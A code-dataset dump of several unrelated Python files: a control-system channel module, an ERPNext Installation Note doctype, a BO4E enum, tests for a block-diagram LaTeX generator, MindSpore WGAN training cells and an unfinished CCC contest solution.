VOLTAGE = "voltage"
PT1000 = "pt1000"
DIGITAL = "digital"
@classmethod
def get_types(cls):
attrs = []
for k, v in cls.__dict__.items():
if isinstance(k, str) and isinstance(v, str) and k[0:2] != "__":
attrs.append(v)
return attrs
class Channel(InstanceTraceable):
def __init__(self, physical, minimum, maximum, physical_minimum,
physical_maximum, name, parameter_name=None,
channel_type=ChannelTypes.UNDEFINED,
units='no_units', db_model=None):
super().__init__()
self.name = None
if __class__.instance_exist(name):
raise KeyError('The name {} is already taken.'.format(name))
else:
self.name = name
self.physical = physical
self.minimum = float(minimum)
self.maximum = float(maximum)
self.physical_minimum = float(physical_minimum)
self.physical_maximum = float(physical_maximum)
self.parameter_name = parameter_name
self.channel_type = channel_type
self.units = units
self.db_model = db_model
if self.channel_type == ChannelTypes.DIGITAL:
self.value = False
else:
self.value = 0.0
def set_minimum(self, minimum):
self.minimum = float(minimum)
def set_maximum(self, maximum):
self.maximum = float(maximum)
def set_physical_minimum(self, physical_minimum):
self.physical_minimum = float(physical_minimum)
def set_physical_maximum(self, physical_maximum):
self.physical_maximum = float(physical_maximum)
@classmethod
def getinstances(cls):
instances = super().getinstances()
sub_inst = []
for inst in instances:
if isinstance(inst, __class__):
sub_inst.append(inst)
return sub_inst
@classmethod
def instance_exist(cls, name):
exist, inst = super().instance_exist(name)
if isinstance(inst, __class__) and exist:
return exist
else:
return False
@classmethod
def getinstance(cls, name):
inst = super().getinstance(name)
if isinstance(inst, __class__):
return inst
else:
return None
class InputChannel(Channel):
def read(self, raw=False):
temp_value = self.physical()
if (self.channel_type == ChannelTypes.VOLTAGE) or \
(self.channel_type == ChannelTypes.CURRENT):
            if not raw:
                temp = transf.range_to_range_linear(temp_value,
                                                    self.physical_minimum,
                                                    self.physical_maximum,
                                                    self.minimum,
                                                    self.maximum)
else:
temp = temp_value
else:
temp = temp_value
self.value = temp
return temp
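# Minimal sketch of the linear range mapping relied on by InputChannel.read
# and OutputChannel.write. The real implementation lives in
# data_science.tools.transformations; this assumed behaviour is shown for
# reference only.
def _range_to_range_linear_sketch(value, in_min, in_max, out_min, out_max):
    """Map `value` linearly from [in_min, in_max] onto [out_min, out_max]."""
    return out_min + (value - in_min) * (out_max - out_min) / (in_max - in_min)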
class OutputChannel(Channel):
def write(self, value, raw=False):
if self.db_model is not None:
channel = self.db_model.objects.filter(name=self.name,
live=True).first()
if (self.channel_type == ChannelTypes.VOLTAGE) or \
(self.channel_type == ChannelTypes.CURRENT):
if not raw:
temp = transf.range_to_range_linear(value,
self.minimum,
self.maximum,
self.physical_minimum,
self.physical_maximum)
else:
temp = value
temp = int(temp)
if self.db_model is not None:
channel.value_analog = temp
else:
temp = value
if self.db_model is not None:
channel.value_digital = temp
self.physical(temp)
self.value = temp
if self.db_model is not None:
channel.save()
def read(self):
if self.db_model is not None:
channel = self.db_model.objects.filter(name=self.name,
live=True).first()
if (self.channel_type == ChannelTypes.VOLTAGE) or \
(self.channel_type == ChannelTypes.CURRENT):
return channel.value_analog
elif self.channel_type == ChannelTypes.DIGITAL:
return channel.value_digital
else:
            raise NotImplementedError(
                'This type of channel is not implemented yet.')
else:
return self.value
class ChannelsUpdater(ThreadableClass):
    """A class to update all physical channels in a StoppableThread."""
def update_channels(self):
instances = Channel.getinstances()
for instance in instances:
if instance.parameter_name is not None:
parameter = Parameter.getinstance(instance.parameter_name)
if isinstance(instance, InputChannel):
value = instance.read()
parameter.update_value(value)
if isinstance(instance, OutputChannel):
instance.write(parameter.value)
    def do_something(self):
        # Runs until the surrounding stoppable thread is terminated.
        while True:
            self.update_channels()
| 34.300578 | 76 | 0.551904 |
9f730f4878c14150dfaac600c74ccb7f12c56d91
| 3,342 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/selling/doctype/installation_note/installation_note.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/selling/doctype/installation_note/installation_note.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/selling/doctype/installation_note/installation_note.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import cstr, getdate
from frappe import _
from erpnext.stock.utils import get_valid_serial_nos
from erpnext.utilities.transaction_base import TransactionBase
class InstallationNote(TransactionBase):
def __init__(self, *args, **kwargs):
super(InstallationNote, self).__init__(*args, **kwargs)
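		# status_updater wires this doctype into ERPNext's generic status rollup:
		# installed qty from Installation Note Items is written back onto the
		# matching Delivery Note Items, and per_installed / installation_status
		# are updated on the parent Delivery Note.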
self.status_updater = [{
'source_dt': 'Installation Note Item',
'target_dt': 'Delivery Note Item',
'target_field': 'installed_qty',
'target_ref_field': 'qty',
'join_field': 'prevdoc_detail_docname',
'target_parent_dt': 'Delivery Note',
'target_parent_field': 'per_installed',
'source_field': 'qty',
'percent_join_field': 'prevdoc_docname',
'status_field': 'installation_status',
'keyword': 'Installed',
'overflow_type': 'installation'
}]
def validate(self):
self.validate_installation_date()
self.check_item_table()
from erpnext.controllers.selling_controller import check_active_sales_items
check_active_sales_items(self)
def is_serial_no_added(self, item_code, serial_no):
has_serial_no = frappe.db.get_value("Item", item_code, "has_serial_no")
if has_serial_no == 1 and not serial_no:
frappe.throw(_("Serial No is mandatory for Item {0}").format(item_code))
elif has_serial_no != 1 and cstr(serial_no).strip():
frappe.throw(_("Item {0} is not a serialized Item").format(item_code))
def is_serial_no_exist(self, item_code, serial_no):
for x in serial_no:
if not frappe.db.exists("Serial No", x):
frappe.throw(_("Serial No {0} does not exist").format(x))
def get_prevdoc_serial_no(self, prevdoc_detail_docname):
serial_nos = frappe.db.get_value("Delivery Note Item",
prevdoc_detail_docname, "serial_no")
return get_valid_serial_nos(serial_nos)
def is_serial_no_match(self, cur_s_no, prevdoc_s_no, prevdoc_docname):
for sr in cur_s_no:
if sr not in prevdoc_s_no:
frappe.throw(_("Serial No {0} does not belong to Delivery Note {1}").format(sr, prevdoc_docname))
def validate_serial_no(self):
prevdoc_s_no, sr_list = [], []
for d in self.get('items'):
self.is_serial_no_added(d.item_code, d.serial_no)
if d.serial_no:
sr_list = get_valid_serial_nos(d.serial_no, d.qty, d.item_code)
self.is_serial_no_exist(d.item_code, sr_list)
prevdoc_s_no = self.get_prevdoc_serial_no(d.prevdoc_detail_docname)
if prevdoc_s_no:
self.is_serial_no_match(sr_list, prevdoc_s_no, d.prevdoc_docname)
def validate_installation_date(self):
for d in self.get('items'):
if d.prevdoc_docname:
d_date = frappe.db.get_value("Delivery Note", d.prevdoc_docname, "posting_date")
if d_date > getdate(self.inst_date):
frappe.throw(_("Installation date cannot be before delivery date for Item {0}").format(d.item_code))
def check_item_table(self):
if not(self.get('items')):
frappe.throw(_("Please pull items from Delivery Note"))
def on_update(self):
frappe.db.set(self, 'status', 'Draft')
def on_submit(self):
self.validate_serial_no()
self.update_prevdoc_status()
frappe.db.set(self, 'status', 'Submitted')
def on_cancel(self):
self.update_prevdoc_status()
frappe.db.set(self, 'status', 'Cancelled')
| 34.8125 | 105 | 0.744165 |
4ccdb1b95f5cdab0bdabb6bcee0e214064200f13
| 355 |
py
|
Python
|
src/bo4e/enum/verbrauchsart.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | 1 |
2022-03-02T12:49:44.000Z
|
2022-03-02T12:49:44.000Z
|
src/bo4e/enum/verbrauchsart.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | 21 |
2022-02-04T07:38:46.000Z
|
2022-03-28T14:01:53.000Z
|
src/bo4e/enum/verbrauchsart.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | null | null | null |
# pylint:disable=missing-module-docstring
from bo4e.enum.strenum import StrEnum
class Verbrauchsart(StrEnum):
"""
Verbrauchsart einer Marktlokation.
"""
KL = "KL" #: Kraft/Licht
KLW = "KLW" #: Kraft/Licht/Wärme
KLWS = "KLWS" #: Kraft/Licht/Wärme/Speicherheizung
W = "W" #: Wärme
WS = "WS" #: Wärme/Speicherheizung
| 22.1875 | 55 | 0.639437 |
4cd24913c08e2cd1841af830403a1453a9f81a09
| 13,454 |
py
|
Python
|
blockschaltbilder/tests/bsb_test.py
|
mp4096/blockschaltbilder
|
9253022b5518e42d784176594d4d6fee7baa1050
|
[
"MIT"
] | 11 |
2016-08-19T18:11:19.000Z
|
2020-07-27T07:04:52.000Z
|
blockschaltbilder/tests/bsb_test.py
|
mp4096/blockschaltbilder
|
9253022b5518e42d784176594d4d6fee7baa1050
|
[
"MIT"
] | 8 |
2016-09-17T16:46:01.000Z
|
2021-04-29T19:59:57.000Z
|
blockschaltbilder/tests/bsb_test.py
|
mp4096/blockschaltbilder
|
9253022b5518e42d784176594d4d6fee7baa1050
|
[
"MIT"
] | 4 |
2016-09-21T18:45:09.000Z
|
2020-07-27T07:08:17.000Z
|
"""Test suit for the Blockschaltbild boilerplate generator."""
import unittest
from ..bsb import Blockschaltbild, BlockschaltbildCoordinate, Block
class TestBlock(unittest.TestCase):
def test_no_pars(self):
"""Test if a block is initialised correctly if no parameters are specified."""
x, y = 3.14, 2.72
b = Block("Spam", "eggs", (x, y), "1 cm")
self.assertEqual(len(b.pars), 0)
def test_some_pars(self):
"""Test if a block is initialised correctly if some parameters are specified."""
x, y = 3.14, 2.72
b = Block("Spam", "eggs", (x, y), "1 cm", ["par1", "par2"])
self.assertEqual(b.pars, ["par1", "par2"])
def test_auto_coord(self):
"""Test auto TikZ coordinate specification for a block."""
x, y = 3.14, 2.72
b = Block("Spam", "eggs", (x, y), "1 cm")
self.assertEqual(b.get_tikz_coordinate("g"),
r"\coordinate (eggs--coord) at (3.14, 2.72);")
def test_latex_def_no_pars(self):
"""Test LaTeX block definition if there are no parameters."""
x, y = 3.14, 2.72
b = Block("Spam", "eggs", (x, y), "1 cm")
self.assertEqual(b.get_latex_definition(),
r"\Spam{eggs}{eggs--coord}{1 cm}")
def test_latex_def_some_pars(self):
"""Test LaTeX block definition if there are some parameters."""
x, y = 3.14, 2.72
b = Block("Spam", "eggs", (x, y), "1 cm", ["par1", "par2"])
self.assertEqual(b.get_latex_definition(),
r"\Spam{eggs}{eggs--coord}{1 cm}{par1}{par2}")
class TestBlockschaltbildCoordinate(unittest.TestCase):
def test_auto_coord(self):
"""Test TikZ coordinate specification."""
x, y = 3.14, 2.72
c = BlockschaltbildCoordinate("eggs", (x, y))
self.assertEqual(c.get_tikz_coordinate("g"),
r"\coordinate (eggs) at (3.14, 2.72);")
def test_latex_def(self):
"""Test LaTeX definition -- must return None."""
x, y = 3.14, 2.72
c = BlockschaltbildCoordinate("eggs", (x, y))
self.assertIsNone(c.get_latex_definition())
class TestBlockschaltbildBasics(unittest.TestCase):
def test_add_block(self):
"""Test block addition."""
bsb = Blockschaltbild()
bsb.add_block("PGlied", "block 1", (0, 0))
bsb.add_block("IGlied", "block 2", (1, 0))
self.assertEqual(bsb.num_blocks, 2)
self.assertEqual(bsb.get_block("block 1").xy, (0, 0))
self.assertEqual(bsb.get_block("block 2").xy, (1, 0))
def test_delete_existing_block(self):
"""Test deletion of an existing block."""
bsb = Blockschaltbild()
bsb.add_block("PGlied", "block 1", (0, 0))
bsb.add_block("IGlied", "block 2", (1, 0))
self.assertEqual(bsb.num_blocks, 2)
bsb.delete_block("block 1")
self.assertRaises(ValueError, bsb.get_block, "block 1")
self.assertEqual(bsb.num_blocks, 1)
bsb.delete_block("block 2")
self.assertRaises(ValueError, bsb.get_block, "block 2")
self.assertEqual(bsb.num_blocks, 0)
def test_delete_nonexisting_block(self):
"""Test deletion of an non-existing block -- must raise exception."""
bsb = Blockschaltbild()
self.assertRaises(ValueError, bsb.delete_block, "spam")
def test_rename_block(self):
"""Test renaming of an existing block."""
bsb = Blockschaltbild()
bsb.add_block("PGlied", "block 1", (0, 0))
bsb.add_block("IGlied", "block 2", (1, 0))
# "block 3" does not exist
self.assertRaises(ValueError,
bsb.rename_block, "block 3", "spam")
# "block 2" already exists
self.assertRaises(ValueError,
bsb.rename_block, "block 1", "block 2")
bsb.rename_block("block 1", "block A")
self.assertRaises(ValueError, bsb.get_block, "block 1")
self.assertEqual(bsb.num_blocks, 2)
self.assertEqual(bsb.get_block("block A").xy, (0, 0))
def test_add_connection(self):
"""Test addition of a connection."""
bsb = Blockschaltbild()
bsb.add_block("PGlied", "block 1", (0, 0))
bsb.add_block("IGlied", "block 2", (1, 0))
bsb.add_connection("block 1", "block 2")
self.assertRaises(ValueError,
bsb.add_connection, "block A", "block 1")
def test_delete_connection(self):
"""Test deletion of a connection."""
bsb = Blockschaltbild()
bsb.add_block("PGlied", "block 1", (0, 0))
bsb.add_block("IGlied", "block 2", (1, 0))
bsb.add_connection("block 1", "block 2")
bsb.delete_connection("block 1", "block 2")
self.assertRaises(ValueError,
bsb.delete_connection, "block 1", "block 2")
def test_add_existing_connection(self):
"""Test addition of an already existing connection -- must raise exception."""
bsb = Blockschaltbild()
bsb.add_block("PGlied", "block 1", (0, 0))
bsb.add_block("IGlied", "block 2", (1, 0))
bsb.add_connection("block 1", "block 2")
self.assertRaises(ValueError,
bsb.add_connection, "block 1", "block 2")
def test_auto_joints(self):
"""Test auto joints placement."""
bsb = Blockschaltbild()
bsb.add_block("PGlied", "block 1", (0, 0))
bsb.add_block("IGlied", "block 2", (1, 0))
bsb.add_block("IGlied", "block 3", (1, 1))
bsb.add_connection("block 1", "block 2")
bsb.add_connection("block 1", "block 3")
bsb.add_auto_joints()
self.assertEqual(bsb.num_blocks, 4)
self.assertEqual(bsb.get_block("ajnt1").block_type, "Verzweigung")
def test_auto_joints_vector_no_auto_joint(self):
"""Auto joints placement should not be triggered by a single vector connection."""
bsb = Blockschaltbild()
bsb.add_block("PGlied", "block 1", (0, 0))
bsb.add_block("IGlied", "block 2", (1, 0))
bsb.add_connection("block 1", "block 2", is_vector=True)
bsb.add_auto_joints()
self.assertEqual(bsb.num_blocks, 2)
def test_auto_joints_vector(self):
"""Auto joints placement should work for multiple vector connections."""
bsb = Blockschaltbild()
bsb.add_block("PGlied", "block 1", (0, 0))
bsb.add_block("IGlied", "block 2", (1, 0))
bsb.add_block("IGlied", "block 3", (1, 1))
bsb.add_connection("block 1", "block 2", is_vector=True)
bsb.add_connection("block 1", "block 3", is_vector=True)
bsb.add_auto_joints()
self.assertEqual(bsb.num_blocks, 4)
self.assertEqual(bsb.get_block("ajnt1").block_type, "Verzweigung")
def test_auto_joints_empty_bsb(self):
"""Test auto joints placement if no blocks are present."""
bsb = Blockschaltbild()
# Must run without exceptions
bsb.add_auto_joints()
self.assertEqual(bsb.num_blocks, 0)
def test_import_sketch(self):
"""Test import of a sketch."""
bsb = Blockschaltbild()
sketch = """
I1 P1
PTE1 PTZ1
D31415
"""
bsb.import_sketch(sketch.splitlines())
self.assertEqual(bsb.num_blocks, 5)
self.assertEqual(bsb.get_block("I1").block_type, "IGlied")
self.assertEqual(bsb.get_block("P1").block_type, "PGlied")
self.assertEqual(bsb.get_block("PTE1").block_type, "PTEinsGlied")
self.assertEqual(bsb.get_block("PTZ1").block_type, "PTZweiGlied")
self.assertEqual(bsb.get_block("D31415").block_type, "DGlied")
def test_import_invalid_sketch_duplications(self):
"""Test import of a sketch with duplicates -- must raise exception."""
bsb = Blockschaltbild()
sketch = ["I1 I1",]
self.assertRaises(ValueError, bsb.import_sketch, sketch)
def test_import_invalid_sketch_empty(self):
"""Test import of an empty sketch -- must return silently."""
bsb = Blockschaltbild()
sketch = [" ", " ", "\t", ]
bsb.import_sketch(sketch)
self.assertEqual(bsb.num_blocks, 0)
def test_import_names(self):
"""Test import of names."""
bsb = Blockschaltbild()
sketch = ["P1 I1", "D1 C1"]
bsb.import_sketch(sketch)
names = ["P1: spam", "I1 : eggs"]
bsb.import_names(names)
self.assertEqual(bsb.num_blocks, 4)
self.assertEqual(bsb.get_block("spam").block_type, "PGlied")
self.assertEqual(bsb.get_block("eggs").block_type, "IGlied")
def test_import_invalid_names(self):
"""Test import of a invalid names -- must raise exception."""
bsb = Blockschaltbild()
names = ["P1: spam", "I1: eggs"]
self.assertRaises(ValueError, bsb.import_names, names)
def test_import_connections(self):
"""Test import of connections."""
bsb = Blockschaltbild()
sketch = ["P1 I1", "D1 C1"]
bsb.import_sketch(sketch)
conns = ["P1 - I1", "I1 - D1", "D1 = C1"]
bsb.import_connections(conns)
self.assertRaises(ValueError,
bsb.add_connection, "P1", "I1")
self.assertRaises(ValueError,
bsb.add_connection, "I1", "D1")
self.assertRaises(ValueError,
bsb.add_connection, "D1", "C1")
def test_import_invalid_connections(self):
"""Test import of an invalid connections -- must raise exception."""
bsb = Blockschaltbild()
conns = ["P1 - I1",]
self.assertRaises(ValueError, bsb.import_connections, conns)
def test_export_to_text(self):
"""High-level (real use) case test of text export."""
block_sizes = {
"coordinate": None,
"Summationsstelle": "0.4 cm",
"Verzweigung": "2 pt",
"PGlied": "1 cm",
"IGlied": "1 cm",
"DGlied": "1 cm",
"PTEinsGlied": "1 cm",
"PTZweiGlied": "1 cm",
"TZGlied": "1 cm",
"UeFunk": "1 cm",
"MGlied": "1 cm",
"KLGlied": "1 cm",
"Saettigung": "1 cm",
}
bsb = Blockschaltbild(x_scale=0.5, y_scale=1.5,
block_sizes=block_sizes,
scalar_style="thick", vector_style="very thick",
arrow_style="-latex")
sketch = [
" C1 S1 S2 I1 I2 C2 ",
" P1 ",
" P2 ",
" ",
]
conns = [
"C1 - S1",
"S1 - S2",
"S2 - I1",
"I1 - I2",
"I1 - P1",
"I2 - C2",
"I2 - P2",
"P1 - S2",
"P2 - S1",
]
names = [
"C1: eingang",
"C2: ausgang",
"S1: sum 1",
"S2: sum 2",
"I1: int 1",
"I2: int 2",
"P1: p 1",
"P2: p 2",
]
bsb.import_sketch(sketch)
bsb.import_connections(conns)
bsb.import_names(names)
bsb.add_auto_joints()
expected_result = "\n".join([
r"\begin{tikzpicture}",
r"",
r"",
r"% <coordinates>",
r"\coordinate (eingang) at (2, 3);",
r"\coordinate (sum 1--coord) at (4, 3);",
r"\coordinate (sum 2--coord) at (6, 3);",
r"\coordinate (p 2--coord) at (8, 0);",
r"\coordinate (p 1--coord) at (8, 1.5);",
r"\coordinate (int 1--coord) at (8, 3);",
r"\coordinate (ajnt1--coord) at (9.6, 3);",
r"\coordinate (int 2--coord) at (10, 3);",
r"\coordinate (ausgang) at (12, 3);",
r"\coordinate (ajnt2--coord) at (12, 3);",
r"% </coordinates>",
r"",
r"",
r"% <blocks>",
r"\Summationsstelle{sum 1}{sum 1--coord}{0.4 cm}",
r"\Summationsstelle{sum 2}{sum 2--coord}{0.4 cm}",
r"\PGlied{p 2}{p 2--coord}{1 cm}{}",
r"\PGlied{p 1}{p 1--coord}{1 cm}{}",
r"\IGlied{int 1}{int 1--coord}{1 cm}{}",
r"\Verzweigung{ajnt1}{ajnt1--coord}{2 pt}",
r"\IGlied{int 2}{int 2--coord}{1 cm}{}",
r"\Verzweigung{ajnt2}{ajnt2--coord}{2 pt}",
r"% </blocks>",
r"",
r"",
r"% <connections>",
r"\draw[thick, -latex] (eingang) -- (sum 1);",
r"\draw[thick, -latex] (sum 1) -- (sum 2);",
r"\draw[thick, -latex] (sum 2) -- (int 1);",
r"\draw[thick, -latex] (p 2) -- (sum 1);",
r"\draw[thick, -latex] (p 1) -- (sum 2);",
r"\draw[thick] (int 1) -- (ajnt1);",
r"\draw[thick, -latex] (ajnt1) -- (p 1);",
r"\draw[thick, -latex] (ajnt1) -- (int 2);",
r"\draw[thick] (int 2) -- (ajnt2);",
r"\draw[thick, -latex] (ajnt2) -- (p 2);",
r"\draw[thick, -latex] (ajnt2) -- (ausgang);",
r"% </connections>",
r"",
r"",
r"\end{tikzpicture}",
r"",
])
self.assertEqual(bsb.export_to_text(), expected_result)
| 38.884393 | 90 | 0.535677 |
2cc78f46fcdda1bdaff840ecea0d19722cb2edab
| 6,122 |
py
|
Python
|
research/cv/wgan/src/cell.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/wgan/src/cell.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/wgan/src/cell.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""" Train one step """
import mindspore.nn as nn
import mindspore.ops.composite as C
import mindspore.ops.operations as P
import mindspore.ops.functional as F
from mindspore.parallel._utils import (_get_device_num, _get_gradients_mean,
_get_parallel_mode)
from mindspore.context import ParallelMode
from mindspore.nn.wrap.grad_reducer import DistributedGradReducer
class GenWithLossCell(nn.Cell):
"""Generator with loss(wrapped)"""
def __init__(self, netG, netD):
super(GenWithLossCell, self).__init__()
self.netG = netG
self.netD = netD
def construct(self, noise):
"""construct"""
fake = self.netG(noise)
errG = self.netD(fake)
loss_G = errG
return loss_G
class DisWithLossCell(nn.Cell):
""" Discriminator with loss(wrapped) """
def __init__(self, netG, netD):
super(DisWithLossCell, self).__init__()
self.netG = netG
self.netD = netD
def construct(self, real, noise):
"""construct"""
errD_real = self.netD(real)
fake = self.netG(noise)
errD_fake = self.netD(fake)
loss_D = errD_real - errD_fake
return loss_D
class ClipParameter(nn.Cell):
""" Clip the parameter """
def __init__(self):
super(ClipParameter, self).__init__()
self.cast = P.Cast()
self.dtype = P.DType()
def construct(self, params, clip_lower, clip_upper):
"""construct"""
new_params = ()
for param in params:
dt = self.dtype(param)
t = C.clip_by_value(param, self.cast(F.tuple_to_array((clip_lower,)), dt),
self.cast(F.tuple_to_array((clip_upper,)), dt))
new_params = new_params + (t,)
return new_params
class GenTrainOneStepCell(nn.Cell):
""" Generator TrainOneStepCell """
def __init__(self, netG, netD,
optimizerG: nn.Optimizer,
sens=1.0):
super(GenTrainOneStepCell, self).__init__()
self.netD = netD
self.netD.set_train(False)
self.netD.set_grad(False)
self.weights_G = optimizerG.parameters
self.optimizerG = optimizerG
self.net = GenWithLossCell(netG, netD)
self.net.set_train()
self.net.set_grad()
self.grad = C.GradOperation(get_by_list=True, sens_param=True)
self.sens = sens
# parallel process
self.reducer_flag = False
self.grad_reducer_G = F.identity
self.parallel_mode = _get_parallel_mode()
if self.parallel_mode in (ParallelMode.DATA_PARALLEL, ParallelMode.HYBRID_PARALLEL):
self.reducer_flag = True
if self.reducer_flag:
mean = _get_gradients_mean()
degree = _get_device_num()
            self.grad_reducer_G = DistributedGradReducer(self.weights_G, mean, degree)  # all-reduces gradients across devices
def construct(self, noise):
""" construct """
loss_G = self.net(noise)
sens = P.Fill()(P.DType()(loss_G), P.Shape()(loss_G), self.sens)
grads = self.grad(self.net, self.weights_G)(noise, sens)
if self.reducer_flag:
grads = self.grad_reducer_G(grads)
return F.depend(loss_G, self.optimizerG(grads))
_my_adam_opt = C.MultitypeFuncGraph("_my_adam_opt")
@_my_adam_opt.register("Tensor", "Tensor")
def _update_run_op(param, param_clipped):
param_clipped = F.depend(param_clipped, F.assign(param, param_clipped))
return param_clipped
class DisTrainOneStepCell(nn.Cell):
""" Discriminator TrainOneStepCell """
def __init__(self, netG, netD,
optimizerD: nn.Optimizer,
clip_lower=-0.01, clip_upper=0.01, sens=1.0):
super(DisTrainOneStepCell, self).__init__()
self.weights_D = optimizerD.parameters
self.clip_parameters = ClipParameter()
self.optimizerD = optimizerD
self.net = DisWithLossCell(netG, netD)
self.net.set_train()
self.net.set_grad()
self.reduce_flag = False
self.op_cast = P.Cast()
self.hyper_map = C.HyperMap()
self.grad = C.GradOperation(get_by_list=True, sens_param=True)
self.sens = sens
self.clip_lower = clip_lower
self.clip_upper = clip_upper
# parallel process
self.reducer_flag = False
self.grad_reducer_D = F.identity
self.parallel_mode = _get_parallel_mode()
if self.parallel_mode in (ParallelMode.DATA_PARALLEL, ParallelMode.HYBRID_PARALLEL):
self.reducer_flag = True
if self.reducer_flag:
mean = _get_gradients_mean()
degree = _get_device_num()
            self.grad_reducer_D = DistributedGradReducer(self.weights_D, mean, degree)  # all-reduces gradients across devices
def construct(self, real, noise):
""" construct """
loss_D = self.net(real, noise)
sens = P.Fill()(P.DType()(loss_D), P.Shape()(loss_D), self.sens)
grads = self.grad(self.net, self.weights_D)(real, noise, sens)
if self.reducer_flag:
grads = self.grad_reducer_D(grads)
upd = self.optimizerD(grads)
weights_D_cliped = self.clip_parameters(self.weights_D, self.clip_lower, self.clip_upper)
res = self.hyper_map(F.partial(_my_adam_opt), self.weights_D, weights_D_cliped)
res = F.depend(upd, res)
return F.depend(loss_D, res)
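def wgan_train_step(train_dis, train_gen, real, sample_noise, n_critic=5):
    """ Sketch of the usual WGAN update schedule for the cells above.
    The argument names are assumptions (the repo's train script is the
    authority): `train_dis` / `train_gen` are constructed DisTrainOneStepCell /
    GenTrainOneStepCell instances and `sample_noise` returns a latent batch.
    The critic is updated `n_critic` times for every generator update.
    """
    loss_d = None
    for _ in range(n_critic):
        loss_d = train_dis(real, sample_noise())
    loss_g = train_gen(sample_noise())
    return loss_d, loss_g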
| 35.80117 | 114 | 0.63721 |
390b912d0628075627beb3e29bdb15a6c98e1460
| 923 |
py
|
Python
|
.venv/Lib/site-packages/dexpy/tests/test_simplex_centroid.py
|
AI-Assistant/FEMAG-Python
|
ff86e8f41485ae9df6034e6b8e810b59f8094c70
|
[
"MIT"
] | 21 |
2016-10-19T18:13:03.000Z
|
2021-11-02T13:58:31.000Z
|
.venv/Lib/site-packages/dexpy/tests/test_simplex_centroid.py
|
AI-Assistant/FEMAG-Python
|
ff86e8f41485ae9df6034e6b8e810b59f8094c70
|
[
"MIT"
] | 43 |
2016-10-11T20:56:28.000Z
|
2020-08-20T16:39:38.000Z
|
.venv/Lib/site-packages/dexpy/tests/test_simplex_centroid.py
|
AI-Assistant/FEMAG-Python
|
ff86e8f41485ae9df6034e6b8e810b59f8094c70
|
[
"MIT"
] | 6 |
2017-12-22T03:47:37.000Z
|
2021-03-13T03:45:26.000Z
|
from unittest import TestCase
from dexpy.simplex_centroid import build_simplex_centroid
from dexpy.eval import det_xtxi
from dexpy.model import make_quadratic_model
import numpy as np
import patsy
class TestSimplexCentroid(TestCase):
@classmethod
def test_d_optimality(cls):
answer_d = [ 2.513455e3, 2.197654e6, 5.52777e9,
1.85905e13, 3.447727e16, 1.275709e19 ]
actual_d = []
for i in range(3, 9):
design = build_simplex_centroid(i)
model = "-1 + " + make_quadratic_model(design.columns,
include_squared=False)
x_matrix = patsy.dmatrix(model,
design,
return_type="dataframe")
actual_d.append(det_xtxi(x_matrix, use_log=False))
np.testing.assert_allclose(answer_d, actual_d, rtol=1e-5)
| 35.5 | 73 | 0.595883 |
1ab4c7276d63c31305a0f58b3a30b10ad230ab33
| 725 |
py
|
Python
|
Contests/CCC/CCC '06 S3 - Tin Can Telephone.py
|
MastaCoder/Projects
|
ebb0a3134522b12f052fec8d753005f384adf1b1
|
[
"MIT"
] | 5 |
2018-10-11T01:55:40.000Z
|
2021-12-25T23:38:22.000Z
|
Contests/CCC/CCC '06 S3 - Tin Can Telephone.py
|
MastaCoder/mini_projects
|
ebb0a3134522b12f052fec8d753005f384adf1b1
|
[
"MIT"
] | null | null | null |
Contests/CCC/CCC '06 S3 - Tin Can Telephone.py
|
MastaCoder/mini_projects
|
ebb0a3134522b12f052fec8d753005f384adf1b1
|
[
"MIT"
] | 1 |
2019-02-22T14:42:50.000Z
|
2019-02-22T14:42:50.000Z
|
# Determinant-based segment intersection check for CCC '06 S3 (Tin Can Telephone).
def line_intersection(l1, l2):
xdiff = (l1[0][0] - l1[1][0], l2[0][0] - l2[1][0])
ydiff = (l1[0][1] - l1[1][1], l2[0][1] - l2[1][1])
def det(a, b):
return a[0] * b[1] - a[1] * b[0]
div = det(xdiff, ydiff)
if div == 0:
return False
d = (det(*l1), det(*l2))
x = det(d, xdiff) / div
y = det(d, ydiff) / div
    # The intersection point must lie within the bounding box of BOTH segments.
    def within(seg, px, py):
        return (min(seg[0][0], seg[1][0]) <= px <= max(seg[0][0], seg[1][0]) and
                min(seg[0][1], seg[1][1]) <= py <= max(seg[0][1], seg[1][1]))
    if within(l1, x, y) and within(l2, x, y):
        return x, y
    return False
# Sample input (assumed format: wire endpoints; number of buildings; then one
# building per line as its vertex count followed by x/y coordinate pairs):
# 0 0 3 3
# 1
# 4 1 2 2 2 2 1 1 1
x1, y1, x2, y2 = map(int, input().split())
wire = ((x1, y1), (x2, y2))
hits = 0
for _ in range(int(input())):
    data = list(map(int, input().split()))
    n, coords = data[0], data[1:]
